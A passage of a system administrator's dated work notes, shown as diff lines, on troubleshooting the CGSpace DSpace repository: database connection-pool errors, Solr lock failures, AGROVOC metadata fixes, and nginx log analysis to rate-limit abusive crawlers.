+<li>Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (<a href="https://github.com/ilri/DSpace/pull/416">#416</a>)</li>
+<li>We are getting the blank page issue on CGSpace again today and I see a <del>large number</del> of the &ldquo;SQL QueryTable Error&rdquo; in the DSpace log again (last time was 2019-03-15):</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#39;SQL QueryTable Error&#39; dspace.log.2019-03-1[5678]
+dspace.log.2019-03-15:929
+dspace.log.2019-03-16:67
+dspace.log.2019-03-17:72
+dspace.log.2019-03-18:1038
+</code></pre><ul>
+<li>Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the &ldquo;binary file matches&rdquo; result with <code>-I</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-18 | wc -l
+8
+$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: &#39;{print $1}&#39; | sort | uniq -c
+      9 dspace.log.2019-03-08
+     25 dspace.log.2019-03-14
+     12 dspace.log.2019-03-15
+     67 dspace.log.2019-03-16
+     72 dspace.log.2019-03-17
+      8 dspace.log.2019-03-18
+</code></pre><ul>
+<li>It seems to be something with grep doing binary matching on some log files for some reason, so I guess I need to always use <code>-I</code> to say binary files don&rsquo;t match</li>
+<li>Anyways, the full error in DSpace&rsquo;s log is:</li>
+</ul>
+<pre tabindex="0"><code>2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is closed.
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
+        at org.apache.tomcat.dbcp.dbcp.PoolingDataSource$PoolGuardConnectionWrapper.prepareStatement(PoolingDataSource.java:313)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:220)
+</code></pre><ul>
+<li>There is a low number of connections to PostgreSQL currently:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
+33
+$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      6 dspaceApi
+      7 dspaceCli
+     15 dspaceWeb
+</code></pre><ul>
+<li>I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:</li>
+</ul>
+<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column &#34;waiting&#34; does not exist at character 217
+</code></pre><ul>
+<li>This is unrelated and apparently due to <a href="https://github.com/munin-monitoring/munin/issues/746">Munin checking a column that was changed in PostgreSQL 9.6</a></li>
+<li>I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it&rsquo;s a Cocoon thing?</li>
+<li>Looking in the cocoon logs I see a large number of warnings about &ldquo;Can not load requested doc&rdquo; around 11AM and 12PM:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-18 | grep -oE &#39;2019-03-18 [0-9]{2}:&#39; | sort | uniq -c
+      2 2019-03-18 00:
+      6 2019-03-18 02:
+      3 2019-03-18 04:
+      1 2019-03-18 05:
+      1 2019-03-18 07:
+      2 2019-03-18 08:
+      4 2019-03-18 09:
+      5 2019-03-18 10:
+    863 2019-03-18 11:
+    203 2019-03-18 12:
+     14 2019-03-18 13:
+      1 2019-03-18 14:
+</code></pre><ul>
+<li>And a few days ago on 2019-03-15 when I happened last it was in the afternoon when it happened and the same pattern occurs then around 1–2PM:</li>
+</ul>
+<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-15.xz | grep -oE &#39;2019-03-15 [0-9]{2}:&#39; | sort | uniq -c
+      4 2019-03-15 01:
+      3 2019-03-15 02:
+      1 2019-03-15 03:
+     13 2019-03-15 04:
+      1 2019-03-15 05:
+      2 2019-03-15 06:
+      3 2019-03-15 07:
+     27 2019-03-15 09:
+      9 2019-03-15 10:
+      3 2019-03-15 11:
+      2 2019-03-15 12:
+    531 2019-03-15 13:
+    274 2019-03-15 14:
+      4 2019-03-15 15:
+     75 2019-03-15 16:
+      5 2019-03-15 17:
+      5 2019-03-15 18:
+      6 2019-03-15 19:
+      2 2019-03-15 20:
+      4 2019-03-15 21:
+      3 2019-03-15 22:
+      1 2019-03-15 23:
+</code></pre><ul>
+<li>And again on 2019-03-08, surprise surprise, it happened in the morning:</li>
+</ul>
+<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-08.xz | grep -oE &#39;2019-03-08 [0-9]{2}:&#39; | sort | uniq -c
+     11 2019-03-08 01:
+      3 2019-03-08 02:
+      1 2019-03-08 03:
+      2 2019-03-08 04:
+      1 2019-03-08 05:
+      1 2019-03-08 06:
+      1 2019-03-08 08:
+    425 2019-03-08 09:
+    432 2019-03-08 10:
+    717 2019-03-08 11:
+     59 2019-03-08 12:
+</code></pre><ul>
+<li>I&rsquo;m not sure if it&rsquo;s cocoon or that&rsquo;s just a symptom of something else</li>
+</ul>
+<h2 id="2019-03-19">2019-03-19</h2>
+<ul>
+<li>I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for a pretty confusing debugging&hellip;</li>
+<li>I will replace these in the database immediately to save myself the headache later:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;
+ count 
+-------
+    84
+(1 row)
+</code></pre><ul>
+<li>Perhaps my <code>agrovoc-lookup.py</code> script could notify if it finds these because they potentially give false negatives</li>
+<li>CGSpace (linode18) is having problems with Solr again, I&rsquo;m seeing &ldquo;Error opening new searcher&rdquo; in the Solr logs and there are no stats for previous years</li>
+<li>Apparently the Solr statistics shards didn&rsquo;t load properly when we restarted Tomcat <em>yesterday</em>:</li>
+</ul>
+<pre tabindex="0"><code>2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
+...
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+        at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:845)
+        ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+</code></pre><ul>
+<li>For reference, I don&rsquo;t see the <code>ulimit -v unlimited</code> in the <code>catalina.sh</code> script, though the <code>tomcat7</code> systemd service has <code>LimitAS=infinity</code></li>
+<li>The limits of the current Tomcat java process are:</li>
+</ul>
+<pre tabindex="0"><code># cat /proc/27182/limits 
+Limit                     Soft Limit           Hard Limit           Units     
+Max cpu time              unlimited            unlimited            seconds   
+Max file size             unlimited            unlimited            bytes     
+Max data size             unlimited            unlimited            bytes     
+Max stack size            8388608              unlimited            bytes     
+Max core file size        0                    unlimited            bytes     
+Max resident set          unlimited            unlimited            bytes     
+Max processes             128589               128589               processes 
+Max open files            16384                16384                files     
+Max locked memory         65536                65536                bytes     
+Max address space         unlimited            unlimited            bytes     
+Max file locks            unlimited            unlimited            locks     
+Max pending signals       128589               128589               signals   
+Max msgqueue size         819200               819200               bytes     
+Max nice priority         0                    0                    
+Max realtime priority     0                    0                    
+Max realtime timeout      unlimited            unlimited            us
+</code></pre><ul>
+<li>I will try to add <code>ulimit -v unlimited</code> to the Catalina startup script and check the output of the limits to see if it&rsquo;s different in practice, as some wisdom on Stack Overflow says this solves the Solr core issues and I&rsquo;ve superstitiously tried it various times in the past
+<ul>
+<li>The result is the same before and after, so <em>adding the ulimit directly is unneccessary</em> (whether or not unlimited address space is useful or not is another question)</li>
+</ul>
+</li>
+<li>For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# find /home/cgspace.cgiar.org/solr/ -iname &#34;*.lock&#34; -delete
+# systemctl start tomcat7
+</code></pre><ul>
+<li>After restarting I confirmed that all Solr statistics cores were loaded successfully&hellip;</li>
+<li>Another avenue might be to look at point releases in Solr 4.10.x, as we&rsquo;re running 4.10.2 and they released 4.10.3 and 4.10.4 back in 2014 or 2015
+<ul>
+<li>I see several issues regarding locks and IndexWriter that were fixed in Solr and Lucene 4.10.3 and 4.10.4&hellip;</li>
+</ul>
+</li>
+<li>I sent a mail to the dspace-tech mailing list to ask about Solr issues</li>
+<li>Testing Solr 4.10.4 on DSpace 5.8:
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Discovery indexing</li>
+<li><input checked="" disabled="" type="checkbox"> dspace-statistics-api indexer</li>
+<li><input checked="" disabled="" type="checkbox"> /solr admin UI</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-20">2019-03-20</h2>
+<ul>
+<li>Create a branch for Solr 4.10.4 changes so I can test on DSpace Test (linode19)
+<ul>
+<li>Deployed Solr 4.10.4 on DSpace Test and will leave it there for a few weeks, as well as on my local environment</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-21">2019-03-21</h2>
+<ul>
+<li>It&rsquo;s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-20 | grep -oE &#39;2019-03-20 [0-9]{2}:&#39; | sort | uniq -c
+      3 2019-03-20 00:
+     12 2019-03-20 02:
+$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-21 | grep -oE &#39;2019-03-21 [0-9]{2}:&#39; | sort | uniq -c
+      4 2019-03-21 00:
+      1 2019-03-21 02:
+      4 2019-03-21 03:
+      1 2019-03-21 05:
+      4 2019-03-21 06:
+     11 2019-03-21 07:
+     14 2019-03-21 08:
+      3 2019-03-21 09:
+      4 2019-03-21 10:
+      5 2019-03-21 11:
+      4 2019-03-21 12:
+      3 2019-03-21 13:
+      6 2019-03-21 14:
+      2 2019-03-21 15:
+      3 2019-03-21 16:
+      3 2019-03-21 18:
+      1 2019-03-21 19:
+      6 2019-03-21 20:
+</code></pre><ul>
+<li>To investigate the Solr lock issue I added a <code>find</code> command to the Tomcat 7 service with <code>ExecStartPre</code> and <code>ExecStopPost</code> and noticed that the lock files are always there&hellip;
+<ul>
+<li>Perhaps the lock files are less of an issue than I thought?</li>
+<li>I will share my thoughts with the dspace-tech community</li>
+</ul>
+</li>
+<li>In other news, I notice that that systemd always thinks that Tomcat has failed when it stops because the JVM exits with code 143, which is apparently normal when processes gracefully receive a SIGTERM (128 + 15 == 143)
+<ul>
+<li>We can add <code>SuccessExitStatus=143</code> to the systemd service so that it knows this is a successful exit</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-22">2019-03-22</h2>
+<ul>
+<li>Share the initial list of invalid AGROVOC terms on Yammer to ask the editors for help in correcting them</li>
+<li>Advise Phanuel Ayuka from IITA about using controlled vocabularies in DSpace</li>
+</ul>
+<h2 id="2019-03-23">2019-03-23</h2>
+<ul>
+<li>CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 [0-9]{2}:&#39; | sort | uniq -c
+      2 2019-03-22 00:
+     69 2019-03-22 01:
+      1 2019-03-22 02:
+     13 2019-03-22 03:
+      2 2019-03-22 05:
+      2 2019-03-22 06:
+      8 2019-03-22 07:
+      4 2019-03-22 08:
+     12 2019-03-22 09:
+      7 2019-03-22 10:
+      1 2019-03-22 11:
+      2 2019-03-22 12:
+     14 2019-03-22 13:
+      4 2019-03-22 15:
+      7 2019-03-22 16:
+      7 2019-03-22 17:
+      3 2019-03-22 18:
+      3 2019-03-22 19:
+      7 2019-03-22 20:
+    323 2019-03-22 21:
+    685 2019-03-22 22:
+    357 2019-03-22 23:
+$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-23 | grep -oE &#39;2019-03-23 [0-9]{2}:&#39; | sort | uniq -c
+    575 2019-03-23 00:
+    445 2019-03-23 01:
+    518 2019-03-23 02:
+    436 2019-03-23 03:
+    387 2019-03-23 04:
+    593 2019-03-23 05:
+    468 2019-03-23 06:
+    541 2019-03-23 07:
+    440 2019-03-23 08:
+    260 2019-03-23 09:
+</code></pre><ul>
+<li>I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn&rsquo;t</li>
+<li>Trying to drill down more, I see that the bulk of the errors started aroundi 21:20:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 21:[0-9]&#39; | sort | uniq -c
+      1 2019-03-22 21:0
+      1 2019-03-22 21:1
+     59 2019-03-22 21:2
+     69 2019-03-22 21:3
+     89 2019-03-22 21:4
+    104 2019-03-22 21:5
+</code></pre><ul>
+<li>Looking at the Cocoon log around that time I see the full error is:</li>
+</ul>
+<pre tabindex="0"><code>2019-03-22 21:21:34,378 WARN  org.apache.cocoon.components.xslt.TraxErrorListener  - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
+</code></pre><ul>
+<li>A few milliseconds before that time I see this in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+        at org.postgresql.jdbc.PgStatement$StatementResultHandler.handleResultRows(PgStatement.java:204)
+        at org.postgresql.core.ResultHandlerDelegate.handleResultRows(ResultHandlerDelegate.java:29)
+        at org.postgresql.core.v3.QueryExecutorImpl$1.handleResultRows(QueryExecutorImpl.java:528)
+        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2120)
+        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:308)
+        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:441)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:365)
+        at org.postgresql.jdbc.PgPreparedStatement.executeWithFlags(PgPreparedStatement.java:143)
+        at org.postgresql.jdbc.PgPreparedStatement.executeQuery(PgPreparedStatement.java:106)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:224)
+        at org.dspace.storage.rdbms.DatabaseManager.querySingleTable(DatabaseManager.java:375)
+        at org.dspace.storage.rdbms.DatabaseManager.findByUnique(DatabaseManager.java:544)
+        at org.dspace.storage.rdbms.DatabaseManager.find(DatabaseManager.java:501)
+        at org.dspace.eperson.Group.find(Group.java:706)
+...
+2019-03-22 21:21:34,381 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+...
+2019-03-22 21:21:34,386 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+...
+2019-03-22 21:21:34,395 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
+org.postgresql.util.PSQLException: This statement has been closed.
+        at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
+        at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
+        at org.postgresql.jdbc.PgStatement.createResultSet(PgStatement.java:153)
+        at org.postgresql.jdbc.PgStatement$StatementResultHandler.handleResultRows(PgStatement.java:204)
+</code></pre><ul>
+<li>
+<p>I restarted Tomcat and now the item displays are working again for now</p>
+</li>
+<li>
+<p>I am wondering if this is an issue with removing abandoned connections in Tomcat&rsquo;s JDBC pooling?</p>
+<ul>
+<li>It&rsquo;s hard to tell because we have <code>logAbanded</code> enabled, but I don&rsquo;t see anything in the <code>tomcat7</code> service logs in the systemd journal</li>
+</ul>
+</li>
+<li>
+<p>I sent another mail to the dspace-tech mailing list with my observations</p>
+</li>
+<li>
+<p>I spent some time trying to test and debug the Tomcat connection pool&rsquo;s settings, but for some reason our logs are either messed up or no connections are actually getting abandoned</p>
+</li>
+<li>
+<p>I compiled this <a href="https://github.com/gnosly/TomcatJdbcConnectionTest">TomcatJdbcConnectionTest</a> and created a bunch of database connections and waited a few minutes but they never got abandoned until I created over <code>maxActive</code> (75), after which almost all were purged at once</p>
+<ul>
+<li>So perhaps our settings are not working right, but at least I know the logging works now&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-24">2019-03-24</h2>
+<ul>
+<li>I did some more tests with the <a href="https://github.com/gnosly/TomcatJdbcConnectionTest">TomcatJdbcConnectionTest</a> thing and while monitoring the number of active connections in jconsole and after adjusting the limits quite low I eventually saw some connections get abandoned</li>
+<li>I forgot that to connect to a remote JMX session with jconsole you need to use a dynamic SSH SOCKS proxy (as I originally <a href="/cgspace-notes/2017-11/">discovered in 2017-11</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
+</code></pre><ul>
+<li>I need to remember to check the active connections next time we have issues with blank item pages on CGSpace</li>
+<li>In other news, I&rsquo;ve been running G1GC on DSpace Test (linode19) since 2018-11-08 without realizing it, which is probably a good thing</li>
+<li>I deployed the latest <code>5_x-prod</code> branch on CGSpace (linode18) and added more validation to the JDBC pool in our Tomcat config
+<ul>
+<li>This includes the new <code>testWhileIdle</code> and <code>testOnConnect</code> pool settings as well as the two new JDBC interceptors: <code>StatementFinalizer</code> and <code>ConnectionState</code> that should hopefully make sure our connections in the pool are valid</li>
+</ul>
+</li>
+<li>I spent one hour looking at the invalid AGROVOC terms from last week
+<ul>
+<li>It doesn&rsquo;t seem like any of the editors did any work on this so I did most of them</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-25">2019-03-25</h2>
+<ul>
+<li>Finish looking over the 175 invalid AGROVOC terms
+<ul>
+<li>I need to apply the corrections and deletions this week</li>
+</ul>
+</li>
+<li>Looking at the DBCP status on CGSpace via jconsole and everything looks good, though I wonder why <code>timeBetweenEvictionRunsMillis</code> is -1, because the <a href="https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html">Tomcat 7.0 JDBC docs</a> say the default is 5000&hellip;
+<ul>
+<li>Could be an error in the docs, as I see the <a href="https://commons.apache.org/proper/commons-dbcp/configuration.html">Apache Commons DBCP</a> has -1 as the default</li>
+<li>Maybe I need to re-evaluate the &ldquo;defauts&rdquo; of Tomcat 7&rsquo;s DBCP and set them explicitly in our config</li>
+<li>From Tomcat 8 they seem to default to Apache Commons&rsquo; DBCP 2.x</li>
+</ul>
+</li>
+<li>Also, CGSpace doesn&rsquo;t have many Cocoon errors yet this morning:</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-25 | grep -oE &#39;2019-03-25 [0-9]{2}:&#39; | sort | uniq -c
+      4 2019-03-25 00:
+      1 2019-03-25 01:
+</code></pre><ul>
+<li>Holy shit I just realized we&rsquo;ve been using the wrong DBCP pool in Tomcat
+<ul>
+<li>By default you get the Commons DBCP one unless you specify factory <code>org.apache.tomcat.jdbc.pool.DataSourceFactory</code></li>
+<li>Now I see all my interceptor settings etc in jconsole, where I didn&rsquo;t see them before (also a new <code>tomcat.jdbc</code> mbean)!</li>
+<li>No wonder our settings didn&rsquo;t quite match the ones in the <a href="https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html">Tomcat DBCP Pool docs</a></li>
+</ul>
+</li>
+<li>Uptime Robot reported that CGSpace went down and I see the load is very high</li>
+<li>The top IPs around the time in the nginx API and web logs were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      9 190.252.43.162
+     12 157.55.39.140
+     18 157.55.39.54
+     21 66.249.66.211
+     27 40.77.167.185
+     29 138.220.87.165
+     30 157.55.39.168
+     36 157.55.39.9
+     50 52.23.239.229
+   2380 45.5.186.2
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    354 18.195.78.144
+    363 190.216.179.100
+    386 40.77.167.185
+    484 157.55.39.168
+    507 157.55.39.9
+    536 2a01:4f8:140:3192::2
+   1123 66.249.66.211
+   1186 93.179.69.74
+   1222 35.174.184.209
+   1720 2a01:4f8:13b:1296::2
+</code></pre><ul>
+<li>The IPs look pretty normal except we&rsquo;ve never seen <code>93.179.69.74</code> before, and it uses the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
+</code></pre><ul>
+<li>Surprisingly they are re-using their Tomcat session:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74&#39; dspace.log.2019-03-25 | sort | uniq | wc -l
+1
+</code></pre><ul>
+<li>That&rsquo;s weird because the total number of sessions today seems low compared to recent days:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-25 | sort -u | wc -l
+5657
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-24 | sort -u | wc -l
+17710
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-23 | sort -u | wc -l
+17179
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-22 | sort -u | wc -l
+7904
+</code></pre><ul>
+<li>PostgreSQL seems to be pretty busy:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+     11 dspaceApi
+     10 dspaceCli
+     67 dspaceWeb
+</code></pre><ul>
+<li>I restarted Tomcat and deployed the new Tomcat JDBC settings on CGSpace since I had to restart the server anyways
+<ul>
+<li>I need to watch this carefully though because I&rsquo;ve read some places that Tomcat&rsquo;s DBCP doesn&rsquo;t track statements and might create memory leaks if an application doesn&rsquo;t close statements before a connection gets returned back to the pool</li>
+</ul>
+</li>
+<li>According the Uptime Robot the server was up and down a few more times over the next hour so I restarted Tomcat again</li>
+</ul>
+<h2 id="2019-03-26">2019-03-26</h2>
+<ul>
+<li>UptimeRobot says CGSpace went down again and I see the load is again at 14.0!</li>
+<li>Here are the top IPs in nginx logs in the last hour:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 
+      3 35.174.184.209
+      3 66.249.66.81
+      4 104.198.9.108
+      4 154.77.98.122
+      4 2.50.152.13
+     10 196.188.12.245
+     14 66.249.66.80
+    414 45.5.184.72
+    535 45.5.186.2
+   2014 205.186.128.185
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    157 41.204.190.40
+    160 18.194.46.84
+    160 54.70.40.11
+    168 31.6.77.23
+    188 66.249.66.81
+    284 3.91.79.74
+    405 2a01:4f8:140:3192::2
+    471 66.249.66.80
+    712 35.174.184.209
+    784 2a01:4f8:13b:1296::2
+</code></pre><ul>
+<li>The two IPV6 addresses are something called BLEXBot, which seems to check the robots.txt file and then completely ignore it by making thousands of requests to dynamic pages like Browse and Discovery</li>
+<li>Then <code>35.174.184.209</code> is MauiBot, which does the same thing</li>
+<li>Also <code>3.91.79.74</code> does, which appears to be CCBot</li>
+<li>I will add these three to the &ldquo;bad bot&rdquo; rate limiting that I originally used for Baidu</li>
+<li>Going further, these are the IPs making requests to Discovery and Browse pages so far today:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;(discover|browse)&#34; | grep -E &#34;26/Mar/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    120 34.207.146.166
+    128 3.91.79.74
+    132 108.179.57.67
+    143 34.228.42.25
+    185 216.244.66.198
+    430 54.70.40.11
+   1033 93.179.69.74
+   1206 2a01:4f8:140:3192::2
+   2678 2a01:4f8:13b:1296::2
+   3790 35.174.184.209
+</code></pre><ul>
+<li><code>54.70.40.11</code> is SemanticScholarBot</li>
+<li><code>216.244.66.198</code> is DotBot</li>
+<li><code>93.179.69.74</code> is some IP in Ukraine, which I will add to the list of bot IPs in nginx</li>
+<li>I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)</li>
+<li>Looking at the database usage I&rsquo;m wondering why there are so many connections from the DSpace CLI:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+       5 dspaceApi
+     10 dspaceCli
+     13 dspaceWeb
+</code></pre><ul>
+<li>Looking closer I see they are all idle&hellip; so at least I know the load isn&rsquo;t coming from some background nightly task or something</li>
+<li>Make a minor edit to my <code>agrovoc-lookup.py</code> script to match subject terms with parentheses like <code>COCOA (PLANT)</code></li>
+<li>Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d -n
+$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d -n
+</code></pre><ul>
+<li>UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0</li>
+<li>Looking at the nginx logs I don&rsquo;t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:</li>
+</ul>
+<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &#34;26/Mar/2019&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
+2931
+</code></pre><ul>
+<li>So I&rsquo;m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with &ldquo;bot&rdquo; in the name for a few days to see if things calm down&hellip; maybe not just yet</li>
+<li>Otherwise, these are the top users in the web and API logs the last hour (18–19):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 
+     54 41.216.228.158
+     65 199.47.87.140
+     75 157.55.39.238
+     77 157.55.39.237
+     89 157.55.39.236
+    100 18.196.196.108
+    128 18.195.78.144
+    277 2a01:4f8:13b:1296::2
+    291 66.249.66.80
+    328 35.174.184.209
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      2 2409:4066:211:2caf:3c31:3fae:2212:19cc
+      2 35.10.204.140
+      2 45.251.231.45
+      2 95.108.181.88
+      2 95.137.190.2
+      3 104.198.9.108
+      3 107.167.109.88
+      6 66.249.66.80
+     13 41.89.230.156
+   1860 45.5.184.2
+</code></pre><ul>
+<li>For the XMLUI I see <code>18.195.78.144</code> and <code>18.196.196.108</code> requesting only CTA items and with no user agent</li>
+<li>They are responsible for almost 1,000 XMLUI sessions today:</li>
+</ul>
